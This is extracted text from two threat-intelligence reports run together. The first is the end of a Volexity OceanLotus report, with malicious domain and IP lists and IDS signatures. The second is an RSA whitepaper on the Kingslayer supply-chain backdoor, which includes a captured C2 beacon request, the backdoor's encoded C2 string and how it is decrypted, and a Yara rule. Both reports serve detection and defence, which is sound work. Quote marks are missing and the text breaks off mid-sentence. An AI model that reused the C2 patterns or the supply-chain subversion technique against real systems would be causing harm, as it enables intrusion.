17/20
s1.gridsumcontent.com
103.28.44.112
s1.jqueryclick.com
64.62.174.145
ssl.security.akamaihd-d.com
37.59.198.131
stat.cdnanalytic.com
203.114.75.22
stats.widgetapi.com
64.62.174.99
track-google.com
203.114.75.73
update.security.akamaihd-d.com
89.33.64.207
update.webfontupdate.com
188.166.219.18
2400:6180:0:d0::4315:d001
wiget.adsfly.co
45.32.100.179
2001:19f0:4400:4798:5400:ff:fe71:3200
www.googleuserscontent.org
139.59.217.207
2400:6180:0:d0::4315:7001
Inactive/Unknown Status
Volexity was able to identify a substantial amount of infrastructure that belongs to OceanLotus
that is setup in a manner consistent with the above hostnames. However, Volexity has not
directly observed attacks leveraging these hostnames.
Hostname
IPv4 Address
IPv6 Address
ad.linksys-analytic.com
64.62.174.16
ads.alternativeads.net
45.77.39.101
2001:19f0:4400:48fd:5400:ff:fe71:3202
api.2nd-weibo.com
64.62.174.146
api.analyticsearch.org
64.62.174.41
api.baiduusercontent.com
79.143.87.174
api.disquscore.com
128.199.227.80
api.fbconnect.net*
sinkholed
cache.akamaihd-d.com
89.33.64.232
cloud.corewidget.com
139.59.217.207
2400:6180:0:d0::4315:7001
core.alternativeads.net
139.59.220.12
2400:6180:0:d0::4315:9001
d3.advertisingbaidu.com
139.59.223.191
eclick.analyticsearch.org
64.62.174.21
google-js.net
45.32.105.45
google-js.org
45.32.105.45
google-script.net
45.32.105.45
gs.baidustats.com
103.28.44.115
18/20
linked.livestreamanalytic.com
139.59.220.10
2400:6180:0:d0::4315:8001
linksys-analytic.com
64.62.174.17
live.webfontupdate.com
188.166.219.18
2400:6180:0:d0::4315:d001
static.livestreamanalytic.com
139.59.220.10
2400:6180:0:d0::4315:8001
stats.corewidget.com
139.59.217.207
2400:6180:0:d0::4315:7001
update.akamaihd-d.com
37.59.198.130
update.webfontupdate.com
188.166.219.18
2400:6180:0:d0::4315:d001
upgrade.liveupdateplugins.com
128.199.90.216
2400:6180:0:d0::4315:c001
widget.jscore-group.com
64.62.174.9
Defending Against OceanLotus
While the described attack campaign relies on fooling a user, the popups on the websites are
quite convincing and legitimate looking. As a result, Volexity would recommend immediately
putting in blocks or sinkholes for the domains and IP addresses listed above to prevent profiling
and possible exploitation. The observed attacks thus far have relied on social engineering
campaigns; however, it would be trivial for OceanLotus to introduce an exploit into this chain. As
for malware indicators, Volexity will be providing additional data related to malware and backdoor
infrastructure in a future write-up to follow soon.
When it comes to Google accounts, Volexity would recommend that users enable the2-Step
Authentication. This is an effective way to prevent access to a Google account should the
password be compromised. However, in the case of this OceanLotus campaign, the attackers are
leveraging a Google App that has OAuth authorized access to the victim
s e-mail and contacts.
This effectively bypasses 2-Step authentication as a result. Users should be very careful to only
authorize legitimate and known Google Apps. Users can verify what Google Apps have access to
their account by visiting the following URL:
https://myaccount.google.com/u/1/permissions
This will list the Google Apps with access to the account along with their permission levels. It is
possible to defend against unauthorized applications and increase a Google Accounts security
through the Google Advanced Protection Program as well
Users can further verify what Google Apps and devices are accessing their account via the
following steps:
Log into Gmail from a web browser via https://mail.google.com
Scroll to the bottom of the page and click Details to see a list of recent accesses to the
account
If any access stands out as coming from an unauthorized application or address, the guidance in
19/20
the steps on the following page should be reviewed:
https://support.google.com/mail/answer/7036019
Finally, for website administrators, the key recommendations are as follows:
Use strong passwords for CMS and system authentication
Restrict access to the system and CMS functionality as much as possible (limited users,
ACLs, etc.)
Implement two-factor (2FA) where possible
Keep operating systems, CMS software, and CMS plugins up-to-date
Disable or remove any accounts that are no longer needed or are unrecognized
Network Signatures
In addition to the domains and IP addresses, the following network signatures can be used to
detect various OceanLotus profiling and targeting activity.
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:
Volex
OceanLotus JavaScript Load
(connect.js)
; flow:to_server,established; content:
; http_method; content:
connect.js?
timestamp=
; http_uri; sid:2017083001; )
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:
Volex
OceanLotus JavaScript Fake
Page URL Builder Response
; flow:to_client,established; file_data;content:
{|22|link|22|:|22|http
depth:13; file_data; content:
|22|load|22|
; sid:2017083002; rev:1;)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:
Volex
OceanLotus System
Profiling JavaScript (linkStorage.x00SOCKET)
; flow:to_client,established; file_data;
content:
linkStorage.x00SOCKET
; sid:2017083003;)
Conclusion
Volexity believes the OceanLotus threat group has rapidly advanced its capabilities and is now
one of the more sophisticated APT actors currently in operation. While Volexity does not typically
engage in attempting attribution of any threat actor, Volexity does agree with previously reported
assessments that OceanLotus is likely operating out of Vietnam. This is largely due to the
extreme and wide-scale nature of certain targeting that would be extremely unlikely to align with
the interests of those outside of Vietnam. As a result, Volexity believes that OceanLotus has been
rapidly developing a highly skilled and organized computer network exploitation (CNE) capability.
20/20
WHITEPAPER
KINGSLAYER
A SUPPLY
CHAIN ATTACK
RSA RESEARCH
CONTENTS
Content and liability disclaimer
Executive summary
Summary
Targeted takedown of Codoso malware
Unexpected finding
A backdoor in product used by sysadmins
Targeted takedown and sinkholing of www.oraclesoft[.]net
An irresistible enticement for Kingslayer actors
Eleven and a half weeks
Kingslayer connections to Codoso and Shell_Crew
Recalling another software supply-chain attack
Kingslayer
s memory-resident brother, the K2 Trojan
Why software supply-chain attacks are here to stay
Software vendors, and sysadmins on notice
How was the Kingslayer investigation informed?
Detection of Kingslayer, and the next software supply chain attack
How to investigate if you might have been compromised by Kingslayer
Conclusion
Acknowledgements
Annex 1: Kingslayer Indicators of Compromise (IOCs)
Appendix A: Event log analyzer application service executable analysis
Appendix B: Select forensic findings from an enterprise admin
s machine
infected with Kingslayer and the K2 secondary malware
CONTENT AND LIABILITY DISCLAIMER
This Research Paper is for general information purposes only, and should not be used as a
substitute for consultation with professional advisors. RSA Security LLC, EMC Corporation,
Dell, Inc. and their affiliates (collectively,
) have exercised reasonable care in the collecting,
processing, and reporting of this information but have not independently verified, validated, or
audited the data to verify the accuracy or completeness of the information. RSA shall not be
responsible for any errors or omissions contained on this Research Paper, and reserves the right
to make changes anytime without notice. Mention of non-RSA products or services is provided
for informational purposes only and constitutes neither an endorsement nor a recommendation
by RSA. All RSA and third-party information provided in this Research Paper is provided on an
basis. RSA DISCLAIMS ALL WARRANTIES, EXPRESSED OR IMPLIED, WITH REGARD TO ANY
INFORMATION (INCLUDING ANY SOFTWARE, PRODUCTS, OR SERVICES) PROVIDED IN THIS
RESEARCH PAPER, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. Some jurisdictions do
not allow the exclusion of implied warranties, so the above exclusion may not apply to you. In no
event shall RSA be liable for any damages whatsoever, and in particular RSA shall not be liable for
direct, special, indirect, consequential, or incidental damages, or damages for lost profits, loss of
revenue or loss of use, cost of replacement goods, loss or damage to data arising out of the use or
inability to use any RSA website, any RSA product or service. This includes damages arising from
use of or in reliance on the documents or information present on this Research Paper, even if RSA
has been advised of the possibility of such damages.
Copyright
2017 Dell Inc. or its subsidiaries. All Rights Reserved. Dell, EMC, RSA and other
trademarks are trademarks of Dell Inc. or its subsidiaries. Other trademarks may be the property
of their respective owners. Published in the USA February 2017.
EXECUTIVE SUMMARY
RSA Research investigated the source of suspicious, observed beaconing
thought to be associated with targeted malware. In the course of this tactical hunt for unidentified code, RSA discovered a sophisticated attack on
a software supply-chain involving a Trojan inserted in otherwise legitimate
software; software that is typically used by enterprise system administrators.
We are sharing details of this attack investigation, along with mitigation and
detection strategies, to promote awareness and preparation for future or
ongoing software supply-chain attacks.
SUMMARY
In notable aviation incidents, aviation experts are charged to perform an
investigation and share the findings in incident reports. Pilot trainers, airlines
and aircraft manufacturers dig into the investigation reports with the goal of
preventing such an incident from happening again. These reports and their
ostensive goal, preventing an incident involving loss of life, have been the
foundation of what is arguably the safest form of transportation. Policies, procedures and aircraft themselves are now safer than ever. Likewise, network
defenders may dig into breach reports with the aim of preventing the next loss
of valuable business information from the networks for which they are responsible. Helping to prevent the next loss of business or mission critical information from a sophisticated exploitation campaign is, at least, one of the major
goals of this report. You might notice we did not say prevention of compromise. After reading this report, it will be obvious that preventing the advanced
enterprise compromise represented by Kingslayer, would be difficult for any
network defender. Preventing such types of compromises from sophisticated actors has always been challenging. The analysts behind this Kingslayer
research project subscribe to the philosophy that detecting and responding to
a compromise, before it leads to business risk, is an achievable goal.
In this Kingslayer post-mortem report, RSA Research describes a sophisticated software application supply chain attack that may have otherwise gone
unnoticed by its targets. This attack is different in that it appears to have
specifically targeted Windows
operating system administrators of large and,
perhaps, sensitive organizations. These organizations appeared on a list of
customers still displayed on the formerly subverted software vendor
s website. Nearly two years after the Kingslayer campaign was initiated, we still do
not know how many of the customers listed on the website may have been
breached, or possibly are still compromised, by the Kingslayer perpetrators.
A NOTE ABOUT
ATTRIBUTION
The malware and activities
described in the Kingslayer
post-mortem report shares code,
tactics and unique malware
artifacts with a large amount
of other malware employed by
actors in campaigns attributed to
various named threat groups. RSA
Research has, for years, dubbed
this group of common tools and
tactics Shell_Crew, since the first
RSA Shell_Crew report released
TARGETED TAKEDOWN OF CODOSO MALWARE
Early in our investigation of, and takedown operation against, a broad exploitation campaign we call Schoolbell1 , RSA Research observed unidentified beaconing to the URL www.oraclesoft[.]net2. We did not know what was causing
the beaconing, but we suspected it was malware. This URL resolved to an IP
address that, at the time, also resolved to another known malicious domain.
This additional, malicious domain, google-dash[.]com3 , was used for command
and control (C2) by a variant of PGV_PVID malware that had no antivirus (AV)
coverage at the time it was submitted to VirusTotal in April 2016 (Figure 1). For
more information on the malware behind this broad exploitation campaign, we
recommend reading the Schoolbell report.
in 2014.
However, shared malware
development supply and
infrastructure does not
necessarily indicate that the
espionage-focused actors behind
the keyboards in this campaign,
are all the same people as
campaigns analyzed by other
researchers. Refer to the section
Kingslayer connections to
Codoso and Shell_Crew
for more
details.
s important to note threat
actors often use domains which
look like popular, well known
domains, even going so far to
temporarily
park
them on IP
addresses associated with the
legitimate entities
but they
have no link to the legitimate
domain or company, as is the case
throughout this research.
Figure 1. Zero out of fifty five antivirus solutions detected this malware at time of first submission
http://blogs.rsa.com/schoolbell-class-is-in-session
s important to note threat actors often use domains which look like well-known domains but
they have no link to the legitimate domain or company
s important to note threat actors often use domains which look like well-known domains but
they have no link to the legitimate domain or company
UNEXPECTED FINDING
We did not know what malware type might be using the domain www.oraclesoft[.]net, but through passive analysis, we identified and contacted an infected
organization. Following some significant monitoring efforts by the cooperating infected subject, endpoint forensic analysis, and reverse engineering, RSA
Research came to an unexpected conclusion. A software application used by
system administrators to analyze Windows logs had been subverted at its distribution point with malicious, signed code, back in April 2015. The remaining
sections of this paper will discuss how that conclusion was made.
A BACKDOOR IN PRODUCT USED BY SYSADMINS
Further research allowed RSA analysts to determine the origin of the offending
software. For the purposes of this publication, we will refer to the unnamed
software vendor as
Alpha
. Alpha owns and operates a website designed to help
Windows system administrators interpret and troubleshoot problems indicated
in Windows event logs. The website also offers paid subscribers a license to a
tool that helps with analyzing Windows event logs. It is this software, and its
updates, that were subverted.
RSA Research obtained a copy of the software suspected of containing the compromise. Figure 2 gives an overview of the general infection chain and C2.
Figure 2 Kingslayer compromise infection chain
For purposes of MSI downloads and for auto-updating the application, Alpha
maintains multiple websites. During the time these particular websites were
subverted, any user who attempted a new install or allowed their current
version to auto-update (the default action) received the malicious version of
the software. This action occurred via an .htaccess redirect on two of Alpha
websites (both MSI download and automated update sites) that pointed to a
website controlled by the malicious actors. This actor-controlled website hosted the subverted, signed versions of the application service executable, and MSI
containing the Trojan. Once the install or update was complete, the software
would attempt to load secondary payloads.
RSA Research observed the legitimate application used a valid Authenticode
signature issued by Alpha. At least three binaries, as well as an MSI software
installation package, were determined to have been modified for malicious
purposes using the Alpha application
s original source code, and signed with the
stolen code signing private key. RSA Research contacted Alpha, who subsequently divulged that their software packaging system was compromised and
had delivered this compromised binary from 09 April 2015 to 25 April 2015.
Complicating our initial attempt at dynamic analysis of the suspected backdoor
in the RSA Research lab was the employment of an unusual diurnal beacon
sleep algorithm.
The The backdoor was configured to only beacon to www.oraclesoft[.]net
between the hours of 1500 to 0000 (3 pm to midnight) UTC; a daily window of
9 hours. It was also configured to only beacon four days a week; on Saturday,
Tuesday, Thursday and Friday.
The exact intent behind this temporal beaconing algorithm is unclear. More
details on Kingslayer
s backdoor sleep algorithm are found in the Kingslayer
executable analysis in Appendix A.
TARGETED TAKEDOWN AND SINKHOLING OF
WWW.ORACLESOFT[.]NET
Armed with the evidence that www.oraclesoft[.]net was being used strictly for
malicious purposes, RSA Research sinkholed4 it to further inform our Kingslayer
investigation.
Within a few days of the sinkholing, RSA Research identified many of the
infected organizations beaconing to our sinkhole and provided compromise
notifications. One of the infected organizations, dubbed
Iota
for the purposes
of this publication, subsequently engaged the RSA Incident Response (IR) team
for remediation assistance.
AN IRRESISTIBLE ENTICEMENT FOR KINGSLAYER
ACTORS
Although we do not know the exact reasons the Kingslayer actors chose to
subvert Alpha
s software product, the list of possible end-users of the application likely served as a powerful motivator. As stated earlier, a free application
license was offered to subscribers of Alpha
s event log information portal service. While we do not know how many of these subscribers took advantage of
the free license and installed the application during the subversion window, it is
logical that some did. Organizations who, at some time, subscribed to the event
log portal are displayed on Alpha
s website and include:
4 major telecommunications providers
10+ western military organizations
24+ Fortune 500 companies
5 major defense contractors
36+ major IT product manufacturers or solutions providers
24+ western government organizations
24+ banks and financial institutions
45+ higher educational institutions
https://en.wikipedia.org/wiki/DNS_sinkhole
ELEVEN AND A HALF WEEKS
Because we have an incomplete picture of the successful Kingslayer target set,
our timeline has some significant gaps. One important gap begging for explanation was the time between when Alpha
s websites and software distribution
were remediated on 26 April 2015, and the time when forensic evidence shows
that Kingslayer visited the Iota network on 15 July 2015 (Figure 3).
Figure 3 Kingslayer substantive event timeline
One might surmise that if Iota was of particular interest to the Kingslayer
actors, then less than eleven and a half weeks would pass before exploitation of
their target network. One possible explanation is that Iota was not a preferred
target at all. Rather, the eleven and a half weeks was spent by the actors exploiting potentially more lucrative targets than Iota. In effect, RSA Research proposes that Iota was an inconsequential target, passed over for some sufficient
time for more important exploitation to be executed. This is why a supply chain
attack is attractive to threat actors; a single compromise within the supply
chain can yield numerous targets with minimal additional effort.
Alpha issued a Security Notification on their website on 30 June 2016 and updated the notification on July 17, 2016 at RSA
s request, following findings from
further investigation on Iota
s network compromised by Kingslayer.
KINGSLAYER CONNECTIONS TO CODOSO AND
SHELL_CREW
The Kingslayer backdoor, discovered during an RSA Research
excavation
into
common C2 infrastructure and malware bytecode, shares tactics previously observed used by Shell_Crew, an adversary RSA Research reported on in January
2014 5 . The specific infrastructure overlapping with the Kingslayer campaign
was tied to an adversary identified as Codoso by Palo Alto 6 and ProofPoint 7 in
the first quarter of 2016, and the apparent operational infrastructure harvesting campaign that we call Schoolbell. We do not have high confidence that the
Codoso perpetrators are directly related to the Shell_Crew activity encountered in 2013 and 2014, but we observed that they use common resources and
tools. For one, Codoso and Shell_Crew use continuously evolving versions of
malware for which no builder or source code has been found in the wild. These
include older Derusbi variants, as well as the newly pressed Rekaf, TXER, PGV_
PVID and Bergard as described by ProofPoint, PaloAlto, and in the Schoolbell
blog post. This indicates that they have some common, restricted source for this
distinctive malware. Consistent common malware bytecode, strings, and encoding routines were also noted by other researchers such as Proofpoint. These
attributes are, thus far, unique to the activity groups and have allowed RSA
Research and others to track malware clusters as they appear in the wild. For
consistency we will attribute the activity in the Kingslayer campaign to Kingslayer, but acknowledge some risk of erroneously conflating it with other threat
groups labeled variously by other researchers as Codoso, as well as historic
activity that RSA Research has grouped together as Shell_Crew.
The clearest operational links between Kingslayer and other recent campaigns
attributed to Codoso are overlapping domains and IP addresses used for C2
in 2015 and 2016. The Kingslayer C2 URL www.oraclesoft[.]net has temporal
overlaps with identified infrastructure from seven other C2 domains and twelve
unique C2 IP addresses associated with at least twenty four unique samples of
malware attributed to Codoso by ProofPoint and Palo Alto (Figure 4, attached
also in Annex), and described in the Schoolbell blogpost by RSA Research.
https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf
http://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/
https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks
Figure 4 How Kingslayer backdoor is linked to identified Codoso/Schoolbell campaign infrastructure
(available for download in Annex 1)
RECALLING ANOTHER SOFTWARE SUPPLY-CHAIN
ATTACK
The Kingslayer campaign shares similarities with another supply-chain attack.
In the Monju Incident 8 the attackers subverted an otherwise legitimate software server by using a redirect to a different, unrelated website controlled by
the actors. Like Kingslayer, the target system with the already installed software would attempt to get an update, but instead received a malicious payload
purporting to be an update that consisted of the original application software
bundled with a Trojan, instead of a legitimate update. In the Kingslayer attack,
systems attempting to get updates to an already installed Windows operating
systems log analysis software program were transparently redirected to a website controlled by the Kingslayer actors, in which the illegitimate website would
download a subverted update executable. What may have differed from the
Monju incident was the fact that while all software installations that attempted
to update during the Kingslayer campaign received a malicious but otherwise
functioning update, we do not know how many of them also received the secondary malware. It is this secondary malware that has not yet been found in the
wild.
We have no evidence to suggest the actors behind the Monju Incident and Kingslayer are related, other than they used one or more of the same tactics.
http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_
The_Monju_Incident1.pdf
KINGSLAYER
S MEMORY-RESIDENT BROTHER, THE
K2 TROJAN
RSA Research believes all of the particular Alpha application installations attempting to update during the 17 day Kingslayer subversion window received a
malicious but otherwise functioning update. We do not know how many of them
also received the secondary malware. Using passive analysis, RSA Research was
able to identify the probable beaconing activity pattern used by the secondary
malware. Like the Kingslayer backdoor loader, the secondary malware used the
domain www.oraclesoft[.]net for C2. We have dubbed this secondary malware
Kingslayer Two
or
The beaconing pattern of K2 differed from the Kingslayer backdoor that loaded it. K2 beacons every ten minutes without a defined
sleep period. Based on passively observed beacon activity from three different
K2-infected systems, we believe K2
s HTTP GET beacon pattern is a three to
four digit load identifier that may represent the K2 malware load sequence
assigned to each unique infection. This number appeared to be both unique, and
static for each infected system. So 3423 in Table 1 might represent the 3,423rd
unique system loaded with the K2 Trojan.
Table 1 Kingslayer secondary malware K2 with possible load identifier highlighted in yellow
GET /softs/updatecheck.html?3423&464336 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: www.oraclesoft.net
RSA Research also has insight into K2 Trojan
s capabilities based on the artifacts left on a system that had K2 installed. (See Appendix B) From the forensic
artifacts, RSA Research infers that K2
s capabilities include:
running arbitrary Windows shell commands with SYSTEM-level privileges,
upload and download of files, and
execution of programs uploaded by the attackers.
WHY SOFTWARE SUPPLY-CHAIN ATTACKS ARE HERE
TO STAY
Supply-chain attacks provide strategic advantages to attackers for several reasons. First, they provide one compromise vector to multiple potential targets.
Second, supply chain exploitation attacks, by their very nature, are stealthy and
have the potential to provide the attacker access to their targets for a much longer period than malware delivered by other common means, by evading traditional network analysis and detection tools. And finally, software supply chain
attacks offer considerable
bang for the buck
against otherwise hardened
targets9 .
https://www.ncsc.gov.uk/content/files/protected_files/guidance_files/Cyber-security-risks-inthe-supply-chain.pdf
In the case of Kingslayer, this especially rings true because the specific system-administrator-related systems most likely to be infected offer the ideal
beachhead and operational staging environment for systematic exploitation of
a large enterprise.
Subverting an application used almost exclusively by enterprise Windows
system administrators gives the perpetrators direct access to the most sensitive parts on an organization
s network via a workstation or server used regularly by the
king of the network.
A system administrator
s workstation and
cache of credentials invariably provides the most access of any system on an
enterprise network. In our experience, the credentials maintained by system
administrators usually enable extensive access to internal and external network
infrastructure of even the most sensitive organization
s enterprise. RSA Research observed Kingslayer installed on the workstation of the senior systems
administrator at one organization and on the domain controllers of another
organization. We assess that installations of the targeted application on workstations or servers with unprivileged users would be exceptions, rather than the
rule, because the purpose of the targeted log analyzer software is to be used by
system, security, and other privileged administrators.
SOFTWARE VENDORS, AND SYSADMINS ON NOTICE
Subversion of an application preferentially used by enterprise system or security administrators provides an advanced threat group a nearly unprecedented
best bang for the buck.
There is no need to craft phishing emails, or sort the
chaff from successful but unfruitful malware infections. It would not be hard to
posit that Kingslayer might serve as a template for other attacks on otherwise
hardened enterprise networks. This should put the developers of applications
and software aimed for exclusive use by enterprise network administrators on
notice. Although the following are good tenants of all software vendors, they
are especially important when the application in question would disproportionality be used by administrators of a network. These include:
File integrity monitoring
Secure (dedicated or virtually private) hosting
Validated time stamping of digital signatures
Secure storage of and deployment of code-signing keys, ideally employing a
High Security Module (HSM)
Comprehensive network and endpoint visibility of development environment
Breach disclosure policy that ensures timely incident notification to affected
customers
Enterprise network administrators should take heed that they are perhaps
the most important and pivotal target for advanced threats interested in what
might be found on those enterprise networks10 . Network admins should not
exempt their own systems, or systems to which only they have access, from
network and endpoint visibility. Sysadmins should also contribute to and follow
a change control policy that evaluates the software vendor and the software
itself for potential risk, prior to installing it11 .
HOW WAS THE KINGSLAYER INVESTIGATION
INFORMED?
The analysis that informed the Kingslayer campaign investigation is described
in general terms as iterative, using
many and any friendly means
employed by
a multi-disciplinary team. While characterizing the purpose, impact and extent
of the malicious activity perpetrated by the Kingslayer campaign operators,
RSA Research provided dozens of hours of advanced incident and analysis
support to infected organizations identified by sinkholing and passive means.
Sometimes our support was in exchange for threat intelligence artifacts left
behind by the actors. At other times we provided advice and expertise with the
understanding that the infected organization would not or could not provide
any information in return. We collaborated with many colleagues in the security industry, reached out to new partners as well as called upon the extensive
capabilities of SecureWorks, a Dell Technologies company.
DETECTION OF KINGSLAYER, AND THE NEXT SOFTWARE SUPPLY CHAIN ATTACK
Techniques deployed by industry-wide antivirus and endpoint prevention technologies are decidedly poorly equipped for detecting, much less preventing, a
remote code-loading backdoor inserted into what would otherwise be a legitimate software product. This is exactly what the Kingslayer actors did in their
campaign.
In our experience, signature or behavior-based antivirus is unable to differentiate between a network-enabled feature and a backdoor in the product. In fact,
RSA Research first identified the Kingslayer backdoor installed on an enterprise
system that employed next generation antivirus. The antivirus failed to detect
anything, even when it appeared the backdoor had downloaded and loaded the
secondary malware into memory, and opened connections for C2.
http://www.slideshare.net/harmj0y/i-hunt-sys-admins-20
http://csrc.nist.gov/scrm/documents/briefings/Workshop-Brief-on-Cyber-Supply-Chain-BestPractices.pdf
RSA NETWITNESS
ENDPOINT EDR TOOL
Compare this antivirus failure with RSA NetWitness
Endpoint, an Enterprise
Detection and Response (EDR) tool that is available to RSA customers and
is notably used by the RSA IR Team in their customer engagements. On a lab
Windows system, RSA Research recreated the Kingslayer backdoor installation, then deployed RSA NetWitness Endpoint. In Figure 5, we see that RSA
NetWitness Endpoint identified an instance of [FLOATING_CODE], revealing
that the backdoored
Service.exe
process established multiple connections.
[FLOATING_CODE] identifies a block of code present in a process private
executable address space, as opposed to a library properly loaded from disk.
Floating code is missing a normal DLL header. In otherwise, legitimate software
with a backdoor such as that employed by Kingslayer, the network connections
were established from that allocated block of code, which is suspicious.
Figure 5 RSA NetWitness Endpoint detection of the Kingslayer backdoor
In Figure 6, a threat hunter behind the RSA NetWitness Endpoint console dug
into the network details tab, to reveal the multiple connections to a suspicious
domain.
Figure 6 RSA Netwitness Endpoint details the network connections kicked off by Kingslayer
s floating code
RSA NETWITNESS PACKETS AND LOGS
While RSA NetWitness Endpoint will flag the floating code of Kingslayer, a
method to detect the network traffic of a backdoor compromise like Kingslayer
with network packet visibility is also important. Consider that the RSA IR team
found a Kingslayer-compromised organization
enjoyed
multiple weeks of static compromise before the actor(s) arrived on scene to begin interactive lateral
exploitation. Early detection of compromise, then, can be key to dramatically
reducing business risk.
The Event Stream Analysis (ESA) capability in RSA NetWitness technology was
designed by researchers in the RSA Data Sciences team after analyzing billions
of packets of known C2 activity. ESA is the statistical threat hunting machine
that never goes to sleep, using machine learning to calculate scores on a very
large number of HTTP sessions and domains. Indeed, even the unusual beaconing patterns of the Kingslayer Trojan were flagged by the ESA as Suspected
C&C (Figure7).
Figure 7 ESA identifies Kingslayer beaconing as Suspected C&C
Even without the interactive C2 of an
operator behind the keyboard
that
might trigger other alerts, consider how a Security Operations Center will be
alerted to suspicious activity, and stop the compromise before an actor starts
controlling assets inside the network. For more details on how to hunt using
RSA NetWitness capabilities such as ESA, refer to the RSA NetWitness hunting
guide12.
https://community.rsa.com/docs/DOC-62341
HOW TO INVESTIGATE IF YOU MIGHT HAVE BEEN
COMPROMISED BY KINGSLAYER
An enterprise network finding that the subverted application was installed
prior to and/or updated during the compromise window of 09-25 April 2015,
should initiate an investigation. While prevention of compromise through Kingslayer might not have been possible without the most stringent change control
policy and thorough software analysis and auditing, an investigation of what
may have been done by Kingslayer actors should be initiated. It is possible that
the actors have established and still maintain avenues of access, especially on
high-value target networks.
How can you tell if a system has had this subverted software installed? The
Yara signature included in the Kingslayer report annex, combined with a
Yara-capable EDR tool, such as RSA NetWitness Endpoint, will facilitate a rapid
enterprise survey for Kingslayer artifacts. RSA Research
s Yara signature will
detect artifacts from the stolen code-signing key used to sign DLLs and EXEs in
the Kingslayer backdoor. While this code-signing key was also used to sign some
limited number of legitimate software versions, any hits with this signature
warrants investigation. Systems and Windows networks found with any of the
Indicators of Compromise (IOCs) in the Kingslayer IOC list, should be analyzed
for compromise. Enterprise investigation should focus on identifying any ongoing C2 channels and activity, and an assessment of business risk/loss should a
breach be indicated.
CONCLUSION
RSA Research observed sustained activity from an advanced threat actor group
over 18+ months, tied to campaigns attributed to Codoso. There was an evolutionary deployment of tools characterized by very low (if any) coverage by
antivirus vendors. In the course of our research and disruption of this malicious
activity, RSA was able to uncover an advanced strategic targeting campaign
involving a software supply chain attack aimed at sysadmins of large enterprises, dubbed Kingslayer. While the entire target set of Kingslayer is unknown,
RSA Research expects the information contained in this report to be useful
for network defenders in determining if they have been Kingslayer subjects of
compromise. This may not be the last software supply chain attack from these
or related actors. We believe Kingslayer, with its inherent enterprise breach
efficacy and long interlude before discovery, could serve as a template for
future strategic network compromises. We illustrated that it takes keen visibility and awareness, and the right tools, to discover advanced threat activity like
Kingslayer. Finally, organizations need to have the ability to detect and respond
to the next supply chain attack, before it has an impact on their business or
mission.
ACKNOWLEDGEMENTS
RSA Research would like to thank Chuck Helstein, Darien Huss of ProofPoint,
Luis Garcia of luisangelgarcia.com, MS-ISAC13 and CCIRC14.
https://msisac.cisecurity.org
https://www.publicsafety.gc.ca/cnt/ntnl-scrt/cbr-scrt/ccirc-ccric-eng.aspx
ANNEX 1: KINGSLAYER INDICATORS OF
COMPROMISE (IOCS)
Download available on rsa.com 15
Yara Signature:
rule Kingslayer_codekey
meta:
author =
RSA Research
date =
03 February 2017
hash2 =
f97a2744a4964044c60ac241f92e05d7
hash3 =
76ab4a360b59fe99be1ba7b9488b5188
hash4 =
1b57396c834d2eb364d28eb0eb28d8e4
strings:
$val0 = { 31 33 31 31 30 34 31 39 33 39 31 39 5A 17 0D 31 35 31 31 30 34 31
39 33 39 31 39 5A }
$ven0 = { 41 6C 74 61 69 72 20 54 65 63 68 6E 6F 6C 6F 67 69 65 73 }
uint16(0) == 0x5A4D and $val0 and $ven0
APPENDIX A: EVENT LOG ANALYZER APPLICATION
SERVICE EXECUTABLE ANALYSIS
Table 2 shows the basic properties of the Kingslayer backdoored service executable
Table 2 Malware file properties
Figure 8 shows the valid Authenticode digital signature of the service executable
Figure 8 Valid Authenticode signature
The Trojan functionality is initiated when the [Redacted]Service is started. The
[Redacted]ServiceMailCheck class is instantiated as an object and the InitCheck() Method is called. Figure 9 shows the code responsible for the InitCheck().
Figure 9 InitCheck() method
The [Redacted]ServiceMailCheck class sets a mailID string to a base64 encoded
value. The InitCheck() Method then calls the public Method Run in a new thread
(Figure 10).
Figure 10 Encoded string
The public Method Run checks the time and uses another encrypted string to
set localization. This decryption routine, detailed later, decrypts the encrypted
string to
Tokyo Standard Time
and will only run on Saturday, Tuesday, Thursday and Friday, in a nine-hour window prior to midnight. The malware is hard
coded to sleep 20 minutes (2 different 10 minute windows) between beacons
(Figure 11).
Figure 11 Beacon timing and interval
The malware will decrypt the previously set MailID variable
Ex9TAVIbXghSXAAFSVBLRE8QWU8QVQ8fQQINT0FJSklLEkQeDFEfQA==
). Figure 12
depicts the decryption routine.
Figure 12 Decryption routine
The routine will initially base64 decode the MailID variable, and then hash the
decoded data with the MD5 hashing algorithm. It will then set a seed byte based
on the first byte of the decoded text. Each byte of the text is XOR decrypted
against its respective byte in the MD5 sum, and then further XOR decrypted by
the seed byte. The python script (Table 3) decodes encoded variables.
Table 3 Python String decrypter to decode Kingslayer
s encoded variables
This script will output the decoded C2 URL. The encoded data from this sample
will decode to http://www.oraclesoft[.]net/mailcheck.png (Figure 13). This URL
matched the traffic that was observed in the beaconing from Iota to the RSA
sink hole.
Figure 13 Beacon matches decrypted URL
The LoadImage() Method creates a new thread and calls the ProcessThread()
Method, passing the URL and password (Figure 14).
Figure 14 New thread for beacon
The ProcessThread() Method connects to the URL and builds the HTTP request
as observed in network traffic. This function then checks to see if the gzip HTTP
response header is present and decompresses the payload. It then sends the
byte string to an unpacking function which writes the file to disk. This activity is
similar to that observed by a ProofPoint analyst in a post on Bergard and Codoso. The ProofPoint analyst observed the Bergard infection to
receive instructions from its C2 to retrieve a PNG file (Fig. 15) containing an encoded PlugX
payload (md5: 5c36e8d5beee7fbc0377db59071b9980)16.
We do not know if the K2 Trojan decoded from the
mailcheck.png
image file
discussed in the main body of this research paper was PlugX, or some other
Trojan/RAT.
https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks
Figure 15 Unpacking method employed to load
The malware then checks the downloaded and unpacked data to verify the first
two bytes are decimal 77 90 (0x4D5A). The malware performs these checks to
ensure the data is a valid executable binary (Figure 16).
Figure 16 K2 Trojan magic check
CloudClimb then calls the RunByML() method which checks if the file is a valid
